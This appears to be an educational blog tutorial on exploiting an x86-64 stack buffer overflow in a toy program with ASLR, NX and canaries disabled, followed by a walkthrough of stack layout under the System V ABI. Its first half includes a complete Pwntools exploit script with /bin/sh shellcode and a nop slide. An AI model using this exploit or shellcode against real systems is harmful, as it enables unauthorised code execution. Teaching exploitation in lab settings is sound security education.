In this article, I am going to show how to exploit a stack-based buffer overflow and the conditions that make this possible. For the purpose of this exercise, we are going to switch off three security features:

- Address Space Layout Randomization (ASLR)
- Non-executable stack (aka stack execution prevention, aka NX bit)
- Stack canary (aka stack-protector)

How to switch off ASLR

To switch off ASLR:

    $ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'

(Note that I didn’t use sudo echo 0 > /proc/sys/kernel/randomize_va_space: the shell performs the output redirection > as the standard user, before sudo runs, but writing to this file requires root permission.)

How to switch off non-executable stack and stack canary security features

To switch off the non-executable stack and the stack canary protections, we need to compile the program as follows:

    $ gcc -fno-stack-protector -z execstack -o overflow64 overflow64.c

The option -z execstack marks the stack as executable, while the option -fno-stack-protector disables the stack canary protection.

Stack-based buffer overflow scheme

A variable positioned on the stack overflows when an operation writes to it without checking its size, so that the write continues beyond the boundaries of the variable. When an operation writes data past the limits of a stack-based buffer, it can overwrite the return address of the function in which the buffer is allocated. This is because, as explained in The Stack, the local variables sit above the return address (at lower memory addresses), as shown in the picture below.

How can we exploit this situation? What can we write into the stack?

The left stacks in both images represent a normal stack. The right stacks in both images represent a stack after the unsafe write operation.
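The before/after picture can also be sketched with a toy model. This is only an illustration, not how a real process lays out memory: the frame is a plain byte array, and the 32-byte distance, the saved rbp value, the return address value, and the helper names are all assumptions made up for the example.

```python
import struct

BUF_TO_SAVED_RBP = 32                 # assumed distance from buffer start to saved rbp
SAVED_RBP = 0x00007FFFFFFFDD00        # made-up value for illustration
RETURN_ADDRESS = 0x0000555555554631   # made-up value for illustration


def make_frame():
    """Toy frame, low to high addresses: buffer, saved rbp, return address."""
    return bytearray(BUF_TO_SAVED_RBP) + struct.pack("<QQ", SAVED_RBP, RETURN_ADDRESS)


def unchecked_write(frame, data):
    """Copy data to the start of the buffer without any bounds check."""
    frame[:len(data)] = data


def return_address(frame):
    """Read the 8-byte little-endian return address stored after the saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_TO_SAVED_RBP + 8)[0]


frame = make_frame()
unchecked_write(frame, b"a" * 20)   # fits in the buffer: return address untouched
print(hex(return_address(frame)))   # 0x555555554631
unchecked_write(frame, b"a" * 48)   # runs past the buffer: return address clobbered
print(hex(return_address(frame)))   # 0x6161616161616161
```

The second write is the "right stack" of the images: the bytes that did not fit in the buffer replaced the saved rbp and the return address.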
The unsafe operation starts writing data at the top of the stack (where the stack variable is stored) and continues beyond its limit until it overwrites the return address of the same function. This is the location where the program expects to find the return address of the function. By overwriting this address we are able to divert the execution of the program.

In this image, we can see that a nop slide is also written to the stack before the shellcode. This is only a series of nop instructions, i.e., no-operation instructions (0x90 in machine code). We use a nop slide because it is sometimes difficult to jump exactly to the start of the shellcode; with the slide, it is enough to jump approximately before it. The nop instruction is 1 byte long, so jumping to any byte address inside the slide will not cause any error: each nop does nothing and moves on to the next instruction. The shellcode is located at the end of the nop slide, so it is executed once the slide has been traversed.

The program to exploit

This is the source code of the program that we are going to exploit:

    // file: overflow64.c
    #include <stdio.h>

    int main(int argc, char* argv[]) {
        char buff[20];
        scanf("%s", buff);
        return 0;
    }

The call to scanf is the vulnerable operation. Why vulnerable? Because the %s conversion has no field width, so scanf does not check the size of the buffer it is copying into (check man scanf).

Let’s compile this program as described previously. The first thing we need to do is to crash the program. If we input enough characters beyond the 20 that buff can hold, the program crashes:

    $ ./overflow64
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Segmentation fault (core dumped)

We can see that the terminal reports Segmentation fault. The next step is to understand why it is crashing. By running dmesg:

    $ dmesg | tail
    ......
    [13401.299114] overflow64[16566]: segfault at 616161616161 ip 0000616161616161 sp 00007fffffffddb0 error 14 in libc-2.27.so[7ffff79e4000+1e7000]

The log shown by dmesg says that the program named “overflow64” received a segfault (segmentation fault) when trying to access the memory location with address 616161616161. (When we ran the program, we input a lot of “a” characters, which in ASCII are represented by the hexadecimal value 0x61. Is it a coincidence? Spoiler alert: no.) This happens because the program is trying to access a memory address that it is not supposed to access.

By giving more “a”s as input we can get a different dmesg message:

    $ dmesg | tail
    ......
    [13747.451995] traps: overflow64[16766] general protection ip:555555554697 sp:7fffffffdda8 error:0 in overflow64[555555554000+1000]

In this case the message refers to a general protection fault. What is this? On the x86_64 architecture the highest canonical user-space address is currently 0x00007fffffffffff. Even though an address is 64 bits long, current processors use only 48 bits of it. With more “a”s the return address becomes 0x6161616161616161, which is not a canonical address, so the ret instruction raises a general protection fault instead of a page fault. The 48-bit limit was chosen because it already gives an address space of 256 terabytes, which will be enough for quite a long time. Instead of wasting hardware and power resources, the hardware manufacturers decided to implement only part of the address width: the architecture design supports 64 bits but the current hardware implementations do not.

To gather even more information on the crash we can run the program within GDB. For this purpose I use GEF to have easier access to debug information.

    $ gdb -q ./overflow64
    GEF for linux ready, type `gef` to start, `gef config` to configure
    73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6
    Reading symbols from ./overflow64...(no debugging symbols found)...done.
    gef➤ r
    Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    Program received signal SIGSEGV, Segmentation fault.
    [ Legend: Modified register | Code | Heap | Stack | String ]
    ───────────────────────────────────────────────────────────────── registers ────
    $rax   : 0x0
    $rbx   : 0x0
    $rcx   : 0x00007ffff7dd0560 → 0x00007ffff7dcc580 → 0x00007ffff7b9996e → 0x636d656d5f5f0043 ("C"?)
    $rdx   : 0x00007ffff7dd18d0 → 0x0000000000000000
    $rsp   : 0x00007fffffffdcd8 → "aaaaaaaaaaaaaaaaaa"
    $rbp   : 0x6161616161616161 ("aaaaaaaa"?)
    $rsi   : 0x1
    $rdi   : 0x0
    $rip   : 0x0000555555554697 → <main+45> ret
    $r8    : 0x0
    $r9    : 0x0
    $r10   : 0x0
    $r11   : 0x0000555555554726 → add BYTE PTR [rax], al
    $r12   : 0x0000555555554560 → <_start+0> xor ebp, ebp
    $r13   : 0x00007fffffffddb0 → 0x0000000000000001
    $r14   : 0x0
    $r15   : 0x0
    $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
    $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
    ───────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffdcd8│+0x0000: "aaaaaaaaaaaaaaaaaa" ← $rsp
    0x00007fffffffdce0│+0x0008: "aaaaaaaaaa"
    0x00007fffffffdce8│+0x0010: 0x00007fffff006161 ("aa"?)
    0x00007fffffffdcf0│+0x0018: 0x0000000100008000
    0x00007fffffffdcf8│+0x0020: 0x000055555555466a → <main+0> push rbp
    0x00007fffffffdd00│+0x0028: 0x0000000000000000
    0x00007fffffffdd08│+0x0030: 0x7d8cd030cadb6f2f
    0x00007fffffffdd10│+0x0038: 0x0000555555554560 → <_start+0> xor ebp, ebp
    ─────────────────────────────────────────────────────────────── code:x86:64 ────
       0x55555555468c <main+34> call 0x555555554540 <__isoc99_scanf@plt>
       0x555555554691 <main+39> mov eax, 0x0
       0x555555554696 <main+44> leave
     → 0x555555554697 <main+45> ret
    [!] Cannot disassemble from $PC
    ─────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "overflow64", stopped, reason: SIGSEGV
    ───────────────────────────────────────────────────────────────────── trace ────
    [#0] 0x555555554697 → main()
    ────────────────────────────────────────────────────────────────────────────────
    0x0000555555554697 in main ()

The program stopped because it received SIGSEGV, i.e., a segmentation fault (see man 7 signal for more information on signals). The code section shows that the program stopped at the ret instruction. The registers and stack sections show the state of the registers and of the stack at that point. Right after the Starting program line, we can see the input that we fed to the program.

The ret instruction takes the address pointed to by the stack pointer (rsp) and continues the execution from there. The address that the program is trying to jump to is an invalid address that we wrote when we overflowed the buffer. Our goal is to be able to write an arbitrary address in this location so that we can divert the execution. We need to write an address whose content, when executed, will eventually run our shellcode.

With the help of GDB we can break in the main function and have a look at the stack address of the function:

    $ gdb -q ./overflow64
    GEF for linux ready, type `gef` to start, `gef config` to configure
    73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6
    Reading symbols from ./overflow64...(no debugging symbols found)...done.
    gef➤ b main
    Breakpoint 1 at 0x66e
    gef➤ r
    Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64
    ......
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffdcc0│+0x0000: 0x00005555555546a0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp
    0x00007fffffffdcc8│+0x0008: 0x00007ffff7a05b97 → <__libc_start_main+231> mov edi, eax
    0x00007fffffffdcd0│+0x0010: 0x0000000000000001
    0x00007fffffffdcd8│+0x0018: 0x00007fffffffdda8 → 0x00007fffffffe12f → "/home/pippo/ctf/lectures/basic_buffer_overflow/ove[...]"
    0x00007fffffffdce0│+0x0020: 0x0000000100008000
    0x00007fffffffdce8│+0x0028: 0x000055555555466a → <main+0> push rbp
    0x00007fffffffdcf0│+0x0030: 0x0000000000000000
    0x00007fffffffdcf8│+0x0038: 0x34f880d1fbfab7e5
    ────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
       0x555555554665 <frame_dummy+5> jmp 0x5555555545d0 <register_tm_clones>
       0x55555555466a <main+0> push rbp
       0x55555555466b <main+1> mov rbp, rsp
     → 0x55555555466e <main+4> sub rsp, 0x30
       0x555555554672 <main+8> mov DWORD PTR [rbp-0x24], edi
       0x555555554675 <main+11> mov QWORD PTR [rbp-0x30], rsi
       0x555555554679 <main+15> lea rax, [rbp-0x20]
       0x55555555467d <main+19> mov rsi, rax
       0x555555554680 <main+22> lea rdi, [rip+0x9d] # 0x555555554724
    ......
    Breakpoint 1, 0x000055555555466e in main ()

(The snippet shows only the interesting parts.) The first stack entry shows that the stack pointer is currently at 0x00007fffffffdcc0. The space for the local variables has not been allocated yet: the sub rsp, 0x30 instruction marked by the arrow is still to be executed. When we overflow the local variables we are going to write our shellcode around this address. In order to execute the shellcode we need to overwrite the return address of the function with our crafted address. The location of the return address relative to the buffer that we are overflowing depends on many things.
It depends on the size of other local variables (and their positions relative to the overflowed one), the stack alignment, and the presence of the stack canary. The best way to find the correct location is to feed the program increasingly long inputs until we can see that we overwrite the return address of the function. In this case the buffer starts at rbp-0x20 (see the lea rax, [rbp-0x20] instruction in the disassembly), so the return address is 32 bytes of locals plus 8 bytes of saved rbp away, i.e., 40 bytes. Once we find the offset of the return address, we need to point it to the shellcode. We have already found the location near where the shellcode will be located. What needs to be placed on the stack is a nop slide to help reach our shellcode, as shown previously. This is achieved with the following code (I am using Pwntools):

    # filename: exploit_overflow64.py
    from pwn import *

    # process name to exploit
    process_path = "./overflow64"

    # byte strings (b"...") so that the script also works with Python 3
    shellcode = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f"
    shellcode += b"\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57"
    shellcode += b"\x54\x5f\x6a\x3b\x58\x0f\x05"

    # return address chosen to land inside the nop slide, a little above
    # the stack address 0x00007fffffffdcc0 seen in GDB
    # the highest canonical user-space address is 0x00007FFFFFFFFFFF
    ret_addr = b"\x00\x00\x7f\xff\xff\xff\xdd\x50"[::-1]  # reversed: little-endian

    # 40 bytes of padding reach the return address
    payload = b"A" * 40 + ret_addr
    payload += b"\x90" * 500 + shellcode

    # Writing payload to file to be used elsewhere (e.g., GDB)
    with open("payload", "wb") as f:
        f.write(payload)

    # start the program
    proc = process(process_path)
    # send payload
    proc.sendline(payload)
    # we need to interact with the spawned shell
    proc.interactive()
    proc.close()

In the payload assignment, we can see that I am preparing the input to the scanf function by writing 40 “A”, then the return address, then 500 nop instructions and finally the shellcode. Now we can give this input to the program: it will overflow the variable and write the crafted return address.
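The payload layout can be checked without Pwntools. The following is a minimal sketch using only the standard library; the function names are hypothetical, and the whitespace check reflects the fact that scanf("%s") stops reading at the first whitespace byte, so none of the payload bytes may be one.

```python
import struct

# Shellcode bytes copied from the exploit script above.
SHELLCODE = bytes.fromhex(
    "4831ff57575e5a48bf2f2f"
    "62696e2f736848c1ef0857"
    "545f6a3b580f05"
)

# Bytes that the C isspace() function treats as whitespace in the default locale.
WHITESPACE = b" \t\n\v\f\r"


def build_payload(ret_addr, padding=40, sled=500):
    """Padding, little-endian return address, nop slide, then shellcode."""
    return b"A" * padding + struct.pack("<Q", ret_addr) + b"\x90" * sled + SHELLCODE


def scanf_safe(payload):
    """True if scanf("%s") would read the whole payload without stopping early."""
    return not any(byte in WHITESPACE for byte in payload)


payload = build_payload(0x00007FFFFFFFDD50)
print(len(payload))          # 577 = 40 + 8 + 500 + 29
print(payload[40:48].hex())  # 50ddffffff7f0000
print(scanf_safe(payload))   # True
```

struct.pack("<Q", ...) produces the same eight bytes as the reversed literal in the script. Note that the two zero bytes at the end of the address are not a problem here: scanf stops at whitespace, not at null bytes.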
If we run it in GDB and break just after the scanf function, our stack will look like this:

    gef➤ dereference $rsp 20
    0x00007fffffffdc90│+0x0000: 0x00007fffffffdda8 → 0x9090909090909090 ← $rsp
    0x00007fffffffdc98│+0x0008: 0x0000000100000000
    0x00007fffffffdca0│+0x0010: 0x4141414141414141
    0x00007fffffffdca8│+0x0018: 0x4141414141414141
    0x00007fffffffdcb0│+0x0020: 0x4141414141414141
    0x00007fffffffdcb8│+0x0028: 0x4141414141414141
    0x00007fffffffdcc0│+0x0030: 0x4141414141414141 ← $rbp
    0x00007fffffffdcc8│+0x0038: 0x00007fffffffdd50 → 0x9090909090909090
    0x00007fffffffdcd0│+0x0040: 0x9090909090909090
    0x00007fffffffdcd8│+0x0048: 0x9090909090909090
    0x00007fffffffdce0│+0x0050: 0x9090909090909090

The entry right after the one marked with $rbp holds the return address that we overwrote when we overflowed the variable, and it now points to a location where nop instructions are stored. The shellcode sits at the end of the nops, so when the function returns, the program slides through them and eventually executes the shellcode, which was our initial goal.
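As a sanity check on the numbers in this dump, the sketch below verifies that the chosen return address falls inside the nop slide and that it is a canonical address. The constants are read from the dump and from the exploit script; the helper names are hypothetical, and the canonical check assumes 48-bit virtual addresses as discussed earlier (it would need adjusting for CPUs with wider addressing).

```python
RET_SLOT = 0x00007FFFFFFFDCC8   # stack entry holding the overwritten return address
SLED_START = RET_SLOT + 8       # the nop slide starts right after it
SLED_LEN = 500                  # number of nop bytes in the payload
RET_ADDR = 0x00007FFFFFFFDD50   # value written into the return address


def in_sled(addr, start=SLED_START, length=SLED_LEN):
    """True if addr points at one of the nop bytes."""
    return start <= addr < start + length


def is_canonical(addr):
    """With 48-bit addressing, bits 63..47 must be all zeros or all ones."""
    top = addr >> 47
    return top == 0 or top == 0x1FFFF


print(in_sled(RET_ADDR))                   # True
print(RET_ADDR - SLED_START)               # 128 bytes into the slide
print(is_canonical(RET_ADDR))              # True
print(is_canonical(0x0000616161616161))    # True: page fault (segfault) on jump
print(is_canonical(0x6161616161616161))    # False: general protection fault on ret
```

The last two lines match the two dmesg messages seen earlier: six overwritten bytes still form a canonical address, while eight bytes of 0x61 do not.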
In this article I want to describe how the stack works and how it is structured.

Background information

The stack is a LIFO (Last In First Out) data structure used to store information about the functions of a running program. The information stored in the stack follows some specifications: for the x86-64 architecture, the System V ABI (Application Binary Interface) is a set of specifications that defines libraries, functions, executables, how these elements interact with each other and much more.

System V ABI

For the x86-64 architecture the System V ABI defines (among other things):

- The stack grows towards low memory locations.
- The registers RDI, RSI, RDX, RCX, R8, R9 (in this order) are used to pass parameters to a function (this is different from the 32-bit x86 architecture, where parameters are passed on the stack). If a function requires more parameters, they are pushed onto the stack.
- The stack alignment is 16 bytes.

Conceptually, on x86-64 architecture the stack looks like this:

Let’s now run an example program and check what is actually stored in the stack.
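The parameter-passing rule listed above can be sketched as a small function. This is a simplified illustration that only covers integer and pointer arguments (floating-point arguments use the xmm registers instead); the function name is hypothetical.

```python
# Registers used for the first six integer/pointer arguments, in order.
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def assign_integer_args(args):
    """Split arguments into register assignments and stack-passed leftovers.

    The stack list is ordered from the lowest address upwards: arguments are
    pushed right to left, so the seventh argument ends up closest to the
    return address.
    """
    regs = dict(zip(INT_ARG_REGS, args))
    stack = list(args[len(INT_ARG_REGS):])
    return regs, stack


print(assign_integer_args([7, 15]))
# ({'rdi': 7, 'rsi': 15}, [])
print(assign_integer_args([1, 2, 3, 4, 5, 6, 7, 8]))
# ({'rdi': 1, 'rsi': 2, 'rdx': 3, 'rcx': 4, 'r8': 5, 'r9': 6}, [7, 8])
```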
The example program

The program that we are going to execute is:

    // file: example64.c
    int multiplication(int a, int b) {
        int c;
        c = a * b;
        return c;
    }

    int main(int argc, char* argv[]) {
        int d;
        d = multiplication(7, 15);
        return d;
    }

I am going to compile the code as:

    $ gcc -mpreferred-stack-boundary=4 -fno-stack-protector -o example64 example64.c

When disassembled, the main function looks like:

    Dump of assembler code for function main:
       0x0000000000000613 <+0>: push rbp
       0x0000000000000614 <+1>: mov rbp,rsp
       0x0000000000000617 <+4>: sub rsp,0x20
       0x000000000000061b <+8>: mov DWORD PTR [rbp-0x14],edi
       0x000000000000061e <+11>: mov QWORD PTR [rbp-0x20],rsi
       0x0000000000000622 <+15>: mov esi,0xf
       0x0000000000000627 <+20>: mov edi,0x7
       0x000000000000062c <+25>: call 0x5fa <multiplication>
       0x0000000000000631 <+30>: mov DWORD PTR [rbp-0x4],eax
       0x0000000000000634 <+33>: mov eax,DWORD PTR [rbp-0x4]
       0x0000000000000637 <+36>: leave
       0x0000000000000638 <+37>: ret
    End of assembler dump.

At <+8> and <+11> we can see that the parameters passed to the main function are stored in two memory locations, [rbp-0x14] and [rbp-0x20]. In fact, as described in Background information, the first two parameters are passed in the registers rdi and rsi. At <+15> and <+20> we can see that the function parameters 15 and 7 are placed in the esi and edi registers before the call to the multiplication function (esi and edi are the lowest 32-bit parts of the 64-bit registers rsi and rdi). Set a breakpoint just before the call to the multiplication function.
When the program hits the breakpoint the stack will look like this:

    gef➤ dereference $rsp 5
    0x00007fffffffdd20│+0x0000: 0x00007fffffffde28 → 0x00007fffffffe1af → "/home/pippo/example64" ← $rsp
    0x00007fffffffdd28│+0x0008: 0x00000001555544f0
    0x00007fffffffdd30│+0x0010: 0x00007fffffffde20 → 0x0000000000000001
    0x00007fffffffdd38│+0x0018: 0x0000000000000000
    0x00007fffffffdd40│+0x0020: 0x0000555555554640 → <__libc_csu_init+0> push r15 ← $rbp

The first entry (0x00007fffffffdd20) shows the result of the instruction mov QWORD PTR [rbp-0x20],rsi (at <+11> of the disassembled main). The value is the second parameter of the function main (argv): it was stored in the register rsi, i.e., the register that contains the second parameter of a function call. The memory location rbp-0x20 points to the byte with value 0x28 (i.e., the rightmost byte of the value 0x00007fffffffde28). Remember that we are on a little-endian architecture, so the value 0x00007fffffffde28 stores its lowest byte at the lowest position in memory. We also need to remember that the stack grows towards lower memory locations.

The second entry (0x00007fffffffdd28) contains the result of the instruction mov DWORD PTR [rbp-0x14],edi (at <+8> of the disassembled main). Only 4 bytes, i.e., edi (DWORD), are copied to the stack: they are the 0x00000001 in the upper half of the entry, since rbp-0x14 is 0x00007fffffffdd2c.

The fourth entry (0x00007fffffffdd38) contains the space used to store the local variable d declared in main. As you can see, it is declared as int, i.e., it occupies 4 bytes.

If we sum up the 4 bytes used to store argc + the 8 bytes of argv + the 4 bytes of the d variable, the total is only 16 bytes. Why is the program allocating 32 bytes with sub rsp,0x20 (at <+4> of the disassembled main)? Although argc is passed in the register edi, which is 4 bytes, the stack reservation is for the full register, i.e., 8 bytes, which brings the total to 20 bytes. Furthermore, the program has been compiled with the option -mpreferred-stack-boundary=4, which aligns the stack to a multiple of 2^4 bytes, i.e., 16 bytes.
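The rounding involved can be sketched in a few lines. This is an illustration only: the 20-byte figure assumes the accounting used above (8 bytes for argc, 8 for argv, 4 for d), and align_up is a hypothetical helper, not something the compiler exposes.

```python
def align_up(size, boundary_log2=4):
    """Round size up to the next multiple of 2**boundary_log2 bytes."""
    boundary = 1 << boundary_log2
    return (size + boundary - 1) & ~(boundary - 1)


needed = 8 + 8 + 4            # argc slot + argv + d, as counted above
print(needed)                 # 20
print(hex(align_up(needed)))  # 0x20
```

The default boundary_log2=4 mirrors the value passed to -mpreferred-stack-boundary.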
Therefore, the only option was to allocate the next multiple of 16 bytes, i.e., 32 bytes (or 0x20 bytes).

GDB tip

In GDB, it’s easy to get confused regarding the position of each byte because they are usually displayed in groups of 8 bytes. To have a visual representation of the memory location, you can follow this sign:

Here, the address on the left points to the rightmost byte of the line, which is also the lowest memory address on the line. Following the arrow we reach the top of the stack, which means going toward low memory addresses.

Continue the example

Let’s now see what the multiplication function looks like when disassembled:

    gef➤ disassemble multiplication
    Dump of assembler code for function multiplication:
       0x00000000000005fa <+0>: push rbp
       0x00000000000005fb <+1>: mov rbp,rsp
       0x00000000000005fe <+4>: mov DWORD PTR [rbp-0x14],edi
       0x0000000000000601 <+7>: mov DWORD PTR [rbp-0x18],esi
       0x0000000000000604 <+10>: mov eax,DWORD PTR [rbp-0x14]
       0x0000000000000607 <+13>: imul eax,DWORD PTR [rbp-0x18]
       0x000000000000060b <+17>: mov DWORD PTR [rbp-0x4],eax
       0x000000000000060e <+20>: mov eax,DWORD PTR [rbp-0x4]
       0x0000000000000611 <+23>: pop rbp
       0x0000000000000612 <+24>: ret
    End of assembler dump.

In this function we can see that there is no space reservation on the stack like the sub rsp,0x20 in the disassembled main function. At <+4> and <+7> we can see the parameters copied beyond rsp, i.e., to addresses lower than rsp. Since multiplication does not call any other function, there is no harm in doing this: the System V ABI reserves a 128-byte area below rsp, known as the red zone, that such leaf functions may use without adjusting rsp. Set a breakpoint at the ret instruction (<+24>).
Once we hit the breakpoint, we can see the stack as follows:

    gef➤ dereference $rsp
    0x00007fffffffdd18│+0x0000: 0x0000555555554631 → <main+30> mov DWORD PTR [rbp-0x4], eax ← $rsp
    0x00007fffffffdd20│+0x0008: 0x00007fffffffde28 → 0x00007fffffffe1af → "/home/pippo/example64"
    0x00007fffffffdd28│+0x0010: 0x00000001555544f0
    0x00007fffffffdd30│+0x0018: 0x00007fffffffde20 → 0x0000000000000001
    0x00007fffffffdd38│+0x0020: 0x0000000000000000
    0x00007fffffffdd40│+0x0028: 0x0000555555554640 → <__libc_csu_init+0> push r15 ← $rbp

The first entry shows that rsp is pointing to the return address, i.e., the address of the instruction in main that will be executed when the multiplication function finishes. (Here, rbp already points to the previous stack frame, so main is ready to resume its execution.)

This is the end of this stack walkthrough. I hope it was helpful; additional resources follow.

Additional resources

More to read about System V ABI: https://wiki.osdev.org/System_V_ABI